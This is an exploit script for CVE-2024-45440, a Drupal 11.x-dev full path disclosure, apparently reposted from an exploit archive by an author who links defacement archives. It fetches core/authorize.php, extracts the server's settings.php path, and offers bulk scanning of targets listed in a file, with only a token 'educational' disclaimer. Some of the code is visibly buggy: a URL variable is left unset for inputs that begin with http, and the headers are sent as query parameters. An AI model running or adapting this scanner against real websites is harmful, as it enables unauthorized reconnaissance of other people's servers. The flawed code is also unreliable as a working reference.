Exploit for Drupal 11.x-dev Path Disclosure CVE-2024-45440

## https://sploitus.com/exploit?id=PACKETSTORM:190573
#!/usr/bin/env python
    # Exploit Title: Drupal 11.x-dev - Full Path Disclosure
    # Date: 2025-04-16
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # MiRROR-H: https://mirror-h.org/search/hacker/49626/
    # Version: 11.x-dev
    # CVE: CVE-2024-45440
    
    # -*- coding:UTF-8 -*-
    import re
    import requests
    def banners():
        cve_id = "CVE-2024-45440"
        description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
                      "core/authorize.php allows Full Path Disclosure (even
    when error logging is None) " \
                      "if the value of hash_salt is file_get_contents of a file
    that does not exist."
        disclaimer = "This tool is for educational purposes only. Any misuse of
    this information is the responsibility of " \
                     "the person utilizing this tool. The author assumes no
    responsibility or liability for any misuse or " \
                     "damage caused by this program."
        width = 100
        banner_top_bottom = "=" * width
        banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
        banner =
    f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
    
        return banner
    def scan_single_url(url=None):
        if url is None:
            print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
    
            url = input("[+] IP/Domain: ")
        if not url.startswith('https://') and not url.startswith('http://'):
            full_url = 'http://' + url + '/core/authorize.php'
        print("[*] Scanning...")
        try:
            headers = {
                "Host": url,
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
    rv:133.0) Gecko/20100101 Firefox/133.0",
                "Accept":
    "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language":
    "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
            }
            response = requests.get(full_url, headers,timeout=10)
            pattern = r'<em class="placeholder">(/.*?settings\.php)'
            matches = re.findall(pattern, response.text)
            # print(response.text)
            if 'settings.php' in response.text:
                print(f"[+] {url} Existed!")
                for match in matches:
                    print("[+] The full path is:", match)
                    return True
            else:
                print(f"[-] {url} Not Exist!")
                return False
        except TimeoutError:
            print(f"[-] {url} Timeout!")
        except Exception as e:
            print(f"[-] {url} Failed!")
            return False
    def scan_multiple_urls():
        print("[+] Input the path of txt Example: ./url.txt or
    C:\\the\\path\\to\\url.txt")
        url_path = input("[+] Path: ")
        url_list = []
        result_list = []
        try:
            with open(url_path, 'r', encoding='utf-8') as f:
                lines = f.readlines()
                for line in lines:
                    url_list.append(line.strip())
        except FileNotFoundError as e:
            print("[-] File Not Found!")
        for url in url_list:
            result = scan_single_url(url)
            if result:
                result_list.append(url)
        print("[+] Successful Target:")
        for result in result_list:
            print(f"[+] {result}")
    def main():
        print(banners())
        print("[1] Scan single url\n[2] Scan multiple urls")
        choice = input("[+] Choose: ")
        if choice == '1':
            scan_single_url()
        elif choice == '2':
            scan_multiple_urls()
        else:
            print("[-] Invalid option selected!")
        pass
    if __name__ == '__main__':
        main()